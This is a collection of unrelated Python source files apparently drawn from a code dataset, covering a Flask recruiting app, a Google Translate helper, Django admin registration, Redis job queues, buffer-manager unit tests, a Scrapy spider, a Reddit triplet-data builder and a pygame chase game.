LoginForm, InterviewForm, ManagerFeedbackForm\nfrom app.models import Employee, Candidate, Interview, Interviewer, Position\n\n# candidate forms\nfrom app.candidate_forms import CandidateRegistrationForm, CandidateLoginForm, CandidateApplicationDetails\n\n\n# recruiter routes\n@app.route('/', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n if current_user.role == \"Manager\":\n candidates = Candidate.query.order_by(Candidate.id)\n return render_template('manager_candidates.html', candidates=candidates)\n else:\n candidates = Candidate.query.order_by(Candidate.id)\n return render_template('all_candidates.html', candidates=candidates)\n form = LoginForm()\n if request.method == 'POST' and form.validate_on_submit():\n employee = Employee.query.filter_by(email=form.email.data).first()\n if employee and employee.password == form.password.data:\n login_user(employee)\n if current_user.role == \"Manager\":\n candidates = Candidate.query.order_by(Candidate.id)\n return render_template('manager_candidates.html', candidates=candidates)\n else:\n candidates = Candidate.query.order_by(Candidate.id)\n return render_template('all_candidates.html', candidates=candidates)\n else:\n flash('Login Unsuccessful. Please check email and password', 'danger')\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route('/candidate//job//interview/new', methods=['GET', 'POST'])\ndef createNewInterview(candidate_id_str, job_id_str):\n candidate = Candidate.query.filter_by(id=candidate_id_str).first()\n job = Position.query.filter_by(id=job_id_str).first()\n interviewers = Employee.query.filter_by(role='Interviewer').all()\n form = InterviewForm()\n if request.method == 'POST' and form.validate_on_submit():\n interview = Interview()\n print(request.form.get('interviewer'))\n interviewer_id = request.form.get('interviewer')\n interview.interviewer_id = interviewer_id\n interview.recruiter_id = current_user.id\n db.session.add(interview)\n db.session.commit()\n return redirect('/interview/' + str(interview.id) + '/set')\n return render_template('new_interview.html', title='Schedule Interview', form=form, interviewers=interviewers,\n candidate=candidate, job=job)\n\n\n@app.route('/interview//set', methods=['GET', 'POST'])\ndef setInterviewTime(interview_id):\n curr_interview = Interview.query.filter_by(id=interview_id).first()\n print(curr_interview.interviewer_id)\n interviewer = Interviewer.query.filter_by(id=curr_interview.interviewer.id).first()\n interviews_by = Interview.query.filter_by(interviewer_id=interviewer.id).all()\n # assumption: assume hours start at 9 and end at 6, each interview can only be an hour long\n possible_start_times = time_population()\n for interview in interviews_by:\n curr_time = interview.start_time\n if curr_time in possible_start_times:\n possible_start_times.remove(curr_time)\n\n print(possible_start_times)\n return render_template('set_time_interview.html', )\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for('login'))\n\n\n# manager routes\n\n@app.route(\"/final_selected_candidates\")\ndef final_selected_candidates():\n candidates = Candidate.query.order_by(Candidate.id)\n return render_template('final_selected_candidates.html', candidates=candidates)\n\n\n@app.route('/info/')\ndef info(candidate_id):\n cur_candidate = Candidate.query.get_or_404(candidate_id)\n return render_template('candidate_info.html', cur_candidate=cur_candidate)\n\n\n@app.route('/candidate_interviews/')\ndef candidate_interviews(candidate_id):\n interviews = Interview.query.filter_by(candidate_id=candidate_id).order_by(Interview.round)\n cur_candidate = Candidate.query.get_or_404(candidate_id)\n return render_template('interview_info.html', interviews=interviews, cur_candidate=cur_candidate)\n\n\n@app.route('/manager_feedback/')\ndef manager_feedback(candidate_id):\n form = ManagerFeedbackForm()\n candidate = Candidate.query.get_or_404(candidate_id)\n return render_template('manager_feedback.html', candidate=candidate, form=form)\n\n# interviewer routes\n\n@app.route(\"/\")\n\n# candidate routes\n\n\n# candidate application link\n@app.route('/application-form', methods=['GET', 'POST'])\ndef application():\n form = CandidateApplicationDetails()\n return render_template('candidate_application.html', title='application', form=form)\n\n\n# candidate login link\n@app.route('/candidate-login', methods=['GET', 'POST'])\ndef candidateLogin():\n form = CandidateLoginForm()\n if form.validate_on_submit():\n return redirect(url_for('application'))\n return render_template('candidate_login.html', title='candidateLogin', form=form)\n\n\n# candidate Registration link\n@app.route('/candidate-registration', methods=['GET', 'POST'])\ndef candidateRegister():\n form = CandidateRegistrationForm()\n if request.method == 'POST':\n return redirect(url_for('candidateLogin'))\n return render_template('candidate_registration.html', title='candidateRegister', form=form)\n\n\ndef time_population():\n list_times = []\n time = 9\n done = False\n while not done:\n list_times.append(datetime.time(time, 0, 0))\n time += 1\n if time == 13:\n time = 1\n if time == 6:\n break\n return list_times\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"384437374","text":"import requests\nfrom decouple import config\n\n\ndef from_google(text, source, target):\n if source == target:\n return text\n\n qs = {\n 'key': config('GOOGLE_API_KEY', cast=str),\n 'source': source,\n 'target': target,\n 'format': 'text',\n 'q': text,\n }\n api_url = 'https://translation.googleapis.com/language/translate/v2'\n\n response = requests.post(api_url, params=qs)\n\n data = response.json()\n if response.ok:\n return data['data']['translations'][0]['translatedText']\n else:\n print(\"Error\")\n print(data)\n raise Exception(data)\n","sub_path":"babel/translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"232334869","text":"# coding=utf-8\nfrom django.contrib import admin\nfrom .models import Author, Book, Publisher\n# Register your models here.\n\n# admin.site.register(Publisher)\n# admin.site.register(Author)\n# admin.site.register(Book)\n\nclass PubAdmin(admin.ModelAdmin):\n list_display = ('name', 'address', 'website')\n search_fields = ('name',)\n list_filter = ('city', 'state_province')\nadmin.site.register(Publisher, PubAdmin)\n\nclass AuthorAdmin(admin.ModelAdmin):\n list_display = ('first_name', 'last_name', 'email')\n search_fields = ('first_name',)\nadmin.site.register(Author, AuthorAdmin)\n\nclass BookAdmin(admin.ModelAdmin):\n list_display = ('title', 'publisher', 'publication_date')\n search_fields = ('title', 'author', 'publisher', 'publication_date')\n list_filter = ('author', 'publisher', 'publication_date')\n filter_horizontal = ('author',)\nadmin.site.register(Book, BookAdmin)","sub_path":"hello/books/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"585063615","text":"num = int(input(\"Input an int: \")) # Do not change this line\n\n# Fill in the missing code below\ncounter=1\ntala=1\nwhile counter<=num:\n print(tala)\n tala+=2\n counter+=1\n \n","sub_path":"first n odd numbers.py","file_name":"first n odd numbers.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610858642","text":"# coding: utf-8\nimport os\nimport sys\nfrom redis import Redis\nfrom rq import Queue\n\nPROJECT_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..'))\nsys.path.append(PROJECT_PATH)\n\nfrom opac_proc.web import config\n\n\nclass Singleton(object):\n _instances = {}\n\n def __new__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__new__(cls, *args, **kwargs)\n return cls._instances[cls]\n\n\nclass RQueues(Singleton):\n redis_conn = None\n q_names = {\n 'extract': {\n 'collection': 'qex_collections',\n 'journal': 'qex_journals',\n 'issue': 'qex_issues',\n 'article': 'qex_articles',\n 'press_release': 'qex_press_releases',\n },\n 'transform': {\n 'collection': 'qtr_collections',\n 'journal': 'qtr_journals',\n 'issue': 'qtr_issues',\n 'article': 'qtr_article',\n 'press_release': 'qtr_press_releases',\n },\n 'load': {\n 'collection': 'qlo_collections',\n 'journal': 'qlo_journals',\n 'issue': 'qlo_issues',\n 'article': 'qlo_articles',\n 'press_release': 'qlo_press_releases',\n }\n }\n\n queues = {\n 'extract': {\n 'collection': None,\n 'journal': None,\n 'issue': None,\n 'article': None,\n 'press_release': None,\n },\n 'transform': {\n 'collection': None,\n 'journal': None,\n 'issue': None,\n 'article': None,\n 'press_release': None,\n },\n 'load': {\n 'collection': None,\n 'journal': None,\n 'issue': None,\n 'article': None,\n 'press_release': None,\n }\n }\n\n def __init__(self, redis_conn=None):\n if redis_conn:\n self.redis_conn = redis_conn\n else:\n self.redis_conn = Redis(**config.REDIS_SETTINGS)\n\n def create_queue(self, stage, model):\n queue = self.queues[stage][model]\n if queue is None:\n q_name = self.q_names[stage][model]\n queue = Queue(q_name, connection=self.redis_conn)\n self.queues[stage][model] = queue\n return queue\n\n def create_queues_for_stage(self, stage):\n for model in self.q_names[stage].keys():\n q = self.queues[stage][model]\n if q is None:\n self.queues[stage][model] = self.create_queue(stage, model)\n\n def get_queue(self, stage, model):\n queue = self.queues[stage][model]\n if queue is None:\n queue = self.create_queue(model, stage)\n return queue\n\n def enqueue(self, stage, model, task, *args, **kwargs):\n queue = self.get_queue(stage, model)\n return queue.enqueue(task, args=args, kwargs=kwargs, timeout=2000)\n","sub_path":"opac_proc/datastore/redis_queues.py","file_name":"redis_queues.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"633734156","text":"import unittest\nimport os\nimport time\nfrom buffer_manager import pin, Block, BufferManager\n\n\nclass TestBlock(unittest.TestCase):\n def setUp(self):\n with open('foo', 'wb') as file:\n file.write(b'Hello World')\n\n def tearDown(self):\n os.remove('foo')\n\n def test_block(self):\n block = Block(5, 'foo', 0)\n self.assertEqual(block.read(), b'Hello') # test read\n block.write(b'abcde')\n self.assertEqual(block.read(), b'abcde') # test write\n self.assertTrue(block.dirty) # test that write sets dirty bit\n block.flush()\n self.assertFalse(block.dirty) # test that flush resets dirty bit\n with open('foo', 'rb') as f:\n self.assertEqual(f.read(), b'abcde World') # test flush writes back to file\n block.pin()\n self.assertEqual(block.pin_count, 1) # test pin increases pin count\n # with self.assertRaises(RuntimeError): # test pinned block cannot be freed\n # block.flush()\n block.unpin()\n self.assertEqual(block.pin_count, 0) # test that unpin increases pin count\n block.flush()\n\n def test_partial_read(self):\n block = Block(5, 'foo', 2) # test partial read\n self.assertEqual(block.effective_bytes, 1)\n self.assertEqual(block.read(), b'd')\n block.write(b'D')\n self.assertEqual(block.read(), b'D')\n block.flush()\n with open('foo', 'rb') as file:\n self.assertEqual(file.read(), b'Hello WorlD')\n\n def test_expanding_write(self):\n block = Block(5, 'foo', 2)\n block.write(b'D12')\n self.assertEqual(block.effective_bytes, 3)\n block.flush()\n with open('foo', 'rb') as file:\n self.assertEqual(file.read(), b'Hello WorlD12')\n\n def test_overflow_write(self):\n block = Block(5, 'foo', 2)\n with self.assertRaises(RuntimeError):\n block.write(b'whos your daddy')\n self.assertEqual(block.read(), b'd') # test the data is not corrupted\n self.assertEqual(block.effective_bytes, 1)\n block.write(b'whos your daddy', trunc=True)\n self.assertEqual(block.read(), b'whos ')\n self.assertEqual(block.effective_bytes, 5)\n self.assertEqual(len(block._memory), 5)\n block.flush()\n with open('foo', 'rb') as file:\n self.assertEqual(file.read(), b'Hello Worlwhos ')\n\n\nclass TestContextManager(unittest.TestCase):\n def setUp(self):\n with open('foo', 'wb') as file:\n file.write(b'Hello World')\n\n def tearDown(self):\n os.remove('foo')\n\n def test_pin(self):\n block = Block(5, 'foo', 0)\n with pin(block):\n self.assertEqual(block.pin_count, 1)\n self.assertEqual(block.read(), b'Hello')\n self.assertEqual(block.pin_count, 0)\n\n\nclass TestBufferManager(unittest.TestCase):\n def setUp(self):\n with open('foo', 'wb') as file:\n file.write(b'Hello World')\n BufferManager.block_size = 5\n BufferManager.total_blocks = 2\n\n def tearDown(self):\n os.remove('foo')\n BufferManager.block_size = 4096\n BufferManager.total_blocks = 1024\n\n def test_buffer_manager(self):\n manager = BufferManager()\n a = manager.get_file_block('foo', 0)\n a.pin()\n self.assertEqual(a.read(), b'Hello')\n b = manager.get_file_block('./foo', 0)\n self.assertTrue(a is b) # test cache hit\n a.write(b'hello')\n # a is not flushed\n\n b = manager.get_file_block('foo', 1)\n b.pin()\n time.sleep(0.5)\n self.assertEqual(b.read(), b' Worl')\n with self.assertRaises(RuntimeError):\n c = manager.get_file_block('foo', 2) # test buffer run out of space\n a.unpin()\n b.unpin()\n c = manager.get_file_block('foo', 2) # test lru swap\n self.assertFalse((os.path.abspath('foo'), 0) in manager._blocks.keys()) # a should be swapped out\n self.assertTrue((os.path.abspath('foo'), 1) in manager._blocks.keys()) # b should remain in the buffer\n with open('foo', 'rb') as file:\n self.assertEqual(file.read(), b'hello World') # test the swapped out block is flushed\n\n def test_singleton(self):\n manager_a = BufferManager()\n manager_b = BufferManager()\n self.assertTrue(manager_a is manager_b)\n\n def test_import_singleton(self):\n import tests.buffer_import_a, tests.buffer_import_b\n self.assertTrue(tests.buffer_import_a.manager is tests.buffer_import_b.manager)\n\n def test_detach(self):\n manager = BufferManager()\n manager.get_file_block('foo', 0)\n manager.detach_from_file('foo')\n self.assertFalse(manager._blocks)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_buffer_manager.py","file_name":"test_buffer_manager.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"354686165","text":"# -*- coding:utf-8 -*-\nimport scrapy\nfrom artile_url.items import CbItem\n\n'''\nwe can only get 100 pages results\n'''\n\n\nclass bidding(scrapy.Spider):\n name = 'bibenet'\n allow_domains = ['bibenet.com']\n url = 'https://www.bibenet.com/search'\n fd = {\n 'messageLikes': '',\n 'pageNum': '1'\n }\n kw = ''\n totalpage = -1\n\n def start_requests(self):\n '''\n get keyword and create first request url\n :return:\n '''\n self.kw = getattr(self, 'kw', None)\n if self.kw is None:\n print(\"please enter key word, like -a kw=yourkeyword\")\n return\n self.fd['messageLikes'] = self.kw\n yield scrapy.FormRequest(url=self.url, formdata=self.fd, callback=self.parse)\n\n def parse(self, response):\n '''\n parse url from response and get next page\n :param response:\n :return:\n '''\n #get urls\n urls = response.xpath(\"//tr//a/@href\")\n for u in urls:\n item = CbItem()\n item['url'] = u.extract()\n print(item)\n yield item\n\n #get nextpage\n pagenum = int(response.xpath(\"//input[@name='pageNum']/@value\").extract()[0])\n if self.totalpage == -1:\n self.totalpage = int(response.xpath(\"//input[@name='totalPage']/@value\").extract()[0])\n # print(pagenum, self.totalpage)\n if pagenum < self.totalpage and pagenum <= 100:\n self.fd['pageNum'] = str(pagenum+1)\n # print(self.fd)\n yield scrapy.FormRequest(url=self.url, formdata=self.fd, callback=self.parse)\n else:\n return\n","sub_path":"src/crawl/artile_url/artile_url/spiders/bibenet.py","file_name":"bibenet.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"538140993","text":"import pandas as pd\nimport numpy as np\nfrom pathlib import Path\nfrom transformers import AutoTokenizer\nimport argparse\nimport json\nimport glob\nimport gzip\nimport random\nimport itertools\nfrom multiprocessing import Pool\n\nDATA_PATH = Path('..') / 'data'\nPROCESSED_PATH = DATA_PATH / 'filtered'\nTRIPLET_PATH = DATA_PATH / 'json' / 'triplet'\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--n-cores', type=int, default=10,\n help='Number of parallel calls to main loop')\nparser.add_argument('--seed', type=int, default=0,\n help='Seed for random call')\nparser.add_argument('--n-examples', type=int, default=1,\n help='Number of negative/positive examples')\nparser.add_argument('--batch-size', type=int, default=10000,\n help='Number of authors per file')\nparser.add_argument('--dataset-name', type=str, default=None,\n help='Dataset name for output path')\n\ndef _shuffle_by_author(df):\n groups = [df for _,df in df.groupby('author')]\n random.shuffle(groups)\n shuffled = pd.concat(groups).reset_index(drop=True)\n return shuffled\n\n\ndef pick_and_drop_examples(df, n):\n ''' Picks examples, pops them from main df, returns them separate df \n Args:\n df (pd.DataFrame): global dataframe\n n (int): number of examples per user \n '''\n idx = df.groupby('author')\\\n .apply(lambda x: np.random.choice(x.index, n, \n replace=False)).values\n idx = list(itertools.chain(*idx))\n ex_df = _shuffle_by_author(df.loc[idx,:])\n df.drop(idx, axis=0, inplace=True)\n return ex_df, df\n\n\ndef _make_user_dict(df, pos_df, neg_df, batch_nr, batch_size):\n ''' Returns dictionary with info on user '''\n alist = []\n for u_idx, u in enumerate(df.author.unique()):\n author_id = (batch_nr - 1) * batch_size + (u_idx + 1)\n anchor = df[df['author']==u]\n neg = neg_df[neg_df['target_author']==u]\n pos = pos_df[pos_df['author']==u]\n adict = {'author': u,\n 'author_id': author_id,\n 'anchor': anchor['selftext'].tolist(),\n 'positive': pos['selftext'].tolist(),\n 'negative': neg['selftext'].tolist(),\n 'n_anchor': anchor.shape[0],\n 'n_positive': pos.shape[0],\n 'n_negative': neg.shape[0],\n 'anchor_subreddits': anchor['subreddit'].tolist(),\n 'positive_subreddits': pos['subreddit'].tolist(),\n 'negative_subreddits': neg['subreddit'].tolist(),\n 'negative_authors': neg['author'].tolist(),\n 'pos_subreddit_overlap': len(set(pos['subreddit']) \\\n & set(anchor['subreddit'])) / \\\n pos.shape[0],\n 'neg_subreddit_overlap': len(set(neg['subreddit']) \\\n & set(anchor['subreddit'])) / \\\n neg.shape[0]}\n alist.append(adict) \n return alist\n\n\n# Main function\ndef make_triplets(f, outpath, seed=0, n_examples=1, \n batch_size=10000):\n ''' For each user, selects which posts are used as anchor,\n positive example, and negative example. Stores this info \n in dataframes (splits into several chunks for ease of \n processing and storage reasons) and in a json file\n Args:\n seed (int): seed for np.random.seed call\n '''\n print(f'Reading {f}...')\n df = pd.read_csv(f, sep='\\t', compression='gzip')\n count_df = df.groupby('author')['selftext'].count().reset_index()\n count_df = count_df.rename({'selftext':'n_posts'}, axis=1)\n df = df.merge(count_df)\n df = df[df['n_posts']>=n_examples*3]\n df['selftext'] = df['selftext'].str.strip()\n\n # Get examples\n np.random.seed(seed)\n neg_df, df = pick_and_drop_examples(df, n=n_examples)\n pos_df, df = pick_and_drop_examples(df, n=n_examples)\n attempt = 0\n\n # Match users and examples\n while True: \n attempt += 1\n print(f'\\tMatch users and examples, attempt {attempt}...')\n alist = df.author.unique().tolist()\n np.random.shuffle(alist)\n alist = [a for a in alist for _ in range(n_examples)]\n if all(alist != neg_df['author']):\n break\n neg_df['target_author'] = alist\n\n # Concatenate and save as json\n ofile_id = f.split('/')[-1].split('.')[0]\n batch_nr = int(ofile_id.split('_')[1])\n ofile_json = outpath / f'{ofile_id}.json.gz'\n d = _make_user_dict(df, pos_df, neg_df, batch_nr, batch_size)\n with gzip.open(ofile_json, 'w') as fh:\n fh.write(json.dumps(d).encode('utf-8'))\n \n\nif __name__==\"__main__\":\n fs = glob.glob(str(PROCESSED_PATH/'*'))\n args = parser.parse_args()\n OUT_PATH = TRIPLET_PATH / str(args.dataset_name) \n OUT_PATH.mkdir(parents=True, exist_ok=True)\n pool = Pool(processes=args.n_cores)\n pool.starmap(make_triplets, zip(fs,\n [OUT_PATH]*len(fs),\n [args.seed]*len(fs),\n [args.n_examples]*len(fs),\n [args.batch_size]*len(fs)))","sub_path":"reddit/preprocessing/triplet/.ipynb_checkpoints/make_triplets-checkpoint.py","file_name":"make_triplets-checkpoint.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"102015639","text":"import pygame\r\nimport random\r\nimport sys\r\nimport time\r\nimport os\r\nimport profile\r\n\r\nusername = os.getlogin()\r\n\r\nround_score = 0\r\ntimer = 0\r\nwidth,height = 800,600\r\npygame.init()\r\nblack = (0,0,0)\r\nwhite = (255,255,255)\r\nblue = (0,0,255)\r\nred = (255,0,0)\r\nyellow = (255,230,0)\r\nyellow2 = (255,188,0)\r\norange = (255,128,0)\r\norange2 = (255,77,0)\r\n\r\ncollision_detected = False\r\ngameloop = True\r\nboard = pygame.display.set_mode((width,height)) #Creates the board\r\npygame.display.set_caption(\"Run\") #Used to set the title of the board window\r\nsmoothx,smoothy = 0,0 # SmoothX and SmoothY will be added to the player coordinates to allow constant motion when a user clicks one of the arrow keys\r\nfps = pygame.time.Clock() #A pygame function that is used to control the amount of cycles per second\r\nlevel = 1\r\nscoreboard = 0\r\nnum_scrap = 0\r\nsmallfont = pygame.font.SysFont('Verdana', 15) #Assigns the font verdana when displaying the score\r\nlargefont = pygame.font.SysFont('Verdana', 40)\r\nbackground = pygame.image.load(\"RunBackground.jpg\")\r\nstart_button = pygame.image.load(\"RunStartButton.png\")\r\nquit_button = pygame.image.load(\"RunQuitButton.png\")\r\nscorebackground = pygame.image.load(\"scorebackground.jpg\")\r\nsuperchargetext = pygame.image.load(\"supercharge.png\")\r\nmenu = True\r\n\r\n\r\nclass user: \r\n def __init__(self,x,y):\r\n self.type = 'player'\r\n self.lives = 5 #Amount of lives the user has \r\n self.x = x #Players x coordinate\r\n self.y = y #Players y coordinate\r\n self.width = 10 #Player Sprite Width\r\n self.height = 10 #Player Sprite Height\r\n \r\n def draw(self):\r\n #This restricts the user from leaving the board as it constantly updates the user coordinates to the edge values\r\n if self.x <= 0:\r\n self.x = 0 + (self.width/2)\r\n if self.x >= width - self.width:\r\n self.x = width - (self.width)\r\n if self.y <= 0:\r\n self.y = 0 + (self.height/2)\r\n if self.y >= height - self.height:\r\n self.y = height - (self.height)\r\n #Applies smoothx and smoothy to the player coordinates so the player can move when a user holds down a key\r\n self.x += smoothx\r\n self.y += smoothy\r\n pygame.draw.rect(board,white,(self.x,self.y,self.width,self.height)) #Displays the user sprite\r\n\r\n def lives(self):\r\n #Used to check and update the lives of a user\r\n if self.lives != 0: #If the lives of the player are not 0 it minuses one as this function is triggered when a collision occurs with a bot\r\n self.lives -= 1\r\n #This will send each bot to the remove_bots method in the robot class\r\n for bot in bots:\r\n robot.remove_bots(bot)\r\n if self.lives == 0:\r\n gameloop = False #Stop the gameloop if the user no longer has any lives\r\n lives_remaining() \r\n \r\n \r\n\r\nclass robot:\r\n def __init__(self):\r\n self.type = 'robot'\r\n #x and y are randomly generated\r\n x = list(range(0, width))\r\n y = list(range(0,height))\r\n safe_x = []\r\n safe_y = []\r\n for number in x:\r\n if number not in range(275,525):\r\n safe_x.append(number)\r\n for number in y:\r\n if number not in range(175,425):\r\n safe_y.append(number)\r\n self.x = random.choice(safe_x) #x is assigned from outside the safe radius\r\n self.y = random.choice(safe_y)#y is assigned from outside the safe radius\r\n for i in range(10):\r\n try:\r\n safe_x.remove(self.x + i)\r\n safe_x.remove(self.x - i)\r\n safe_y.remove(self.y + i)\r\n safe_y.remove(self.y - i)\r\n except ValueError:\r\n pass\r\n\r\n self.colour = red # Sets the colours of bots to red \r\n self.ground = False # Ground is used to make a bot stationary when it turns into a scrap pile\r\n self.width = 10\r\n self.height = 10\r\n\r\n def draw_bots(self):\r\n #Displays the bots\r\n pygame.draw.rect(board,self.colour,(self.x,self.y,self.width,self.height))\r\n \r\n def remove_bots(self):\r\n #Removes the bots when the player collides with a robot and then it calls the function generate_bots to replace them with new ones\r\n del bots[:]\r\n generate_bots()\r\n \r\n def pathfinding(self):\r\n #Compares the x values and y values with the player and moves towards it accordingly\r\n #E.G playerx = 5 botx = 2 if playerx > botx botx +=1\r\n speed = 3\r\n if timer > 1000:\r\n speed = 5\r\n if self.x <= 0:\r\n self.x = 0 + (self.width/2)\r\n if self.x >= width - self.width:\r\n self.x = width - (self.width)\r\n if self.y <= 0:\r\n self.y = 0 + (self.height/2)\r\n if self.y >= height - self.height:\r\n self.y = height - (self.height) \r\n if self.ground != True:\r\n if player.x > self.x:\r\n self.x += speed\r\n if player.x < self.x:\r\n self.x -= speed\r\n if player.y > self.y:\r\n self.y += speed\r\n if player.y < self.y:\r\n self.y -= speed\r\n \r\n def scrap_pile(self,other):\r\n global num_scrap\r\n self.ground = True #Makes the bot stationary\r\n self.colour = blue #Makes the scrap pile blue\r\n if other in bots:\r\n bots.remove(other) #Removes one of the bots when two collide together so one scrap pile is created \r\n pygame.draw.rect(board,blue,(self.x,self.y,self.width,self.height)) #Outputs the scrap pile\r\n self.type = 'scrap'\r\n\r\n \r\nclass collision:\r\n def __init__():\r\n super().__init__()\r\n \r\n def bot_collision_detection(self, other):\r\n collision_detected = False\r\n #checks each region of the bot to see if it collided with another bot\r\n if other.x + other.width >= self.x >= other.x and other.y + other.height >= self.y >= other.y:\r\n collision_detected = True\r\n if other.x + other.width >= self.x + self.width >= other.x and other.y + other.height >= self.y >= other.y:\r\n collision_detected = True\r\n if other.x + other.width >= self.x >= other.x and other.y + other.height >= self.y + self.height >= other.y:\r\n collision_detected = True\r\n if other.x + other.width >= self.x + self.width>= other.x and other.y + other.height >= self.y + self.height >= other.y:\r\n collision_detected = True\r\n if collision_detected == True:\r\n robot.scrap_pile(self,other)\r\n \r\n def user_collision_detection(self, other):\r\n #checks each region of the bot to see if it collided with another bot\r\n collision_detected = False\r\n if other.x + other.width >= self.x >= other.x and other.y + other.height >= self.y >= other.y:\r\n collision_detected = True\r\n if other.x + other.width >= self.x + self.width >= other.x and other.y + other.height >= self.y >= other.y:\r\n collision_detected = True\r\n if other.x + other.width >= self.x >= other.x and other.y + other.height >= self.y + self.height >= other.y:\r\n collision_detected = True\r\n if other.x + other.width >= self.x + self.width>= other.x and other.y + other.height >= self.y + self.height >= other.y:\r\n collision_detected = True\r\n if collision_detected == True:\r\n user.lives(self)\r\n\r\ndef generate_bots():\r\n player.x, player.y =int(width/2),int(height/2) #updates the player position back to the centre\r\n global bots\r\n global timer\r\n timer = 0\r\n if level == 1:\r\n bots = [robot() for x in range(3)] #Creates 5 bot instances when level is 1\r\n if level == 2:\r\n bots = [robot() for x in range(5)]\r\n if level == 3:\r\n bots = [robot() for x in range(7)] #Creates 10 bot instances when level is 2\r\n if level == 4:\r\n bots = [robot() for x in range(11)] #Creates 10 bot instances when level is 3\r\n if level == 5:\r\n bots = [robot() for x in range(13)] #Creates 10 bot instances when level is 4\r\n if level == 6:\r\n bots = [robot() for x in range(15)]\r\n if level > 6:\r\n winning_screen()\r\n\r\n\r\ndef score(score):\r\n #Displays the Score\r\n text = smallfont.render('Score: ' + str(score), True, white)\r\n board.blit(text, [0,0])\r\n\r\ndef display_lives():\r\n if player.lives == 0:\r\n winning_screen()\r\n #Displays the Lives\r\n else:\r\n text = smallfont.render('Lives: ' + str(player.lives), True, white)\r\n board.blit(text, [0, 15])\r\n\r\n\r\ndef countdown():\r\n global round_score\r\n round_score = scoreboard\r\n for x in range(3, 0, -1):\r\n board.fill(black)\r\n text = smallfont.render('Level ' + str(level), True, white)\r\n num_of_bots = smallfont.render('Number of Robots: ' + str(len(bots)), True, white)\r\n numbers = smallfont.render('Starting In ' + str(x), True, white)\r\n board.blit(text, [width/2- 50, height/2 - 50])\r\n board.blit(num_of_bots, [width/2- 100, height/2 - 25])\r\n board.blit(numbers, [width/2- 75, height/2]) \r\n pygame.display.flip() \r\n time.sleep(1)\r\n\r\ndef lives_remaining():\r\n global scoreboard\r\n global round_score\r\n scoreboard = round_score\r\n board.fill(black)\r\n text = smallfont.render('Lives Remaining: ' + str(player.lives), True, white)\r\n board.blit(text, [width/2- 90, height/2 - 50])\r\n pygame.display.flip() \r\n time.sleep(3)\r\n\r\ndef create_environment():\r\n generate_bots()\r\n countdown()\r\n\r\ndef super_charge_bar():\r\n board.blit(superchargetext,[width/2 - 52, 0])\r\n bar_width = 0.14 * timer\r\n if timer < 500:\r\n pygame.draw.rect(board,yellow,(325,20,bar_width,10))\r\n if timer >= 500 and timer < 750:\r\n pygame.draw.rect(board,yellow2,(325,20,bar_width,10))\r\n if timer >= 750 and timer < 875:\r\n pygame.draw.rect(board,orange,(325,20,bar_width,10))\r\n if timer >= 875 and timer < 1000:\r\n pygame.draw.rect(board,orange2,(325,20,bar_width,10))\r\n if timer >= 1000:\r\n pygame.draw.rect(board,red,(325,20,140,10)) \r\n \r\n\r\ndef start_menu():\r\n global menu\r\n while menu == True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n mouse = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n if 125 + 172 > mouse[0] > 150 and 448 + 69 > mouse[1] > 448 and click[0] == 1:\r\n menu = False\r\n create_environment()\r\n break\r\n if 502 + 172 > mouse[0] > 502 and 448 + 69 > mouse[1] > 448 and click[0] == 1:\r\n menu = False\r\n pygame.quit()\r\n quit()\r\n board.blit(background,(0,0))\r\n board.blit(start_button,(125,448))\r\n board.blit(quit_button,(502,448))\r\n pygame.display.update()\r\n\r\n\r\nplayer = user(int(width/2),int(height/2)) \r\nstart_menu()\r\n\r\ndef winning_screen():\r\n global gameloop\r\n global fps\r\n gameloop = False\r\n score_display = scoreboard\r\n score_display = score_display + (player.lives * 500)\r\n scoretext = largefont.render(str(score_display), True, white)\r\n x_shift = len(str(score_display)) * 11.5\r\n board.blit(scorebackground, [0,0])\r\n board.blit(scoretext, [width/2- x_shift, height/2]) \r\n pygame.display.update()\r\n save(score_display)\r\n time.sleep(5)\r\n pygame.display.quit()\r\n sys.exit()\r\n pygame.quit()\r\n\r\n\r\ndef save(score_display):\r\n user_profile = profile.User_Profile(username)\r\n user_profile.update_score(score_display)\r\n user_profile.add_game_record('Run')\r\n user_profile.save()\r\n\r\n \r\n#MAIN GAME LOOP\r\nwhile gameloop == True:\r\n num_scraps = 0\r\n\r\n fps.tick(60) #Sets FPS to 60\r\n \r\n for event in pygame.event.get(): #Checks each event\r\n if event.type == pygame.QUIT: #If one of the events are quit (when the user clicks the X in the top right corner) the window closes\r\n pygame.quit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_w:\r\n smoothy = -5\r\n elif event.key == pygame.K_s:\r\n smoothy = 5\r\n elif event.key == pygame.K_a:\r\n smoothx = -5\r\n elif event.key == pygame.K_d:\r\n smoothx = 5\r\n elif event.type == pygame.KEYUP:\r\n if event.key == pygame.K_w and smoothy < 0:\r\n smoothy = 0\r\n elif 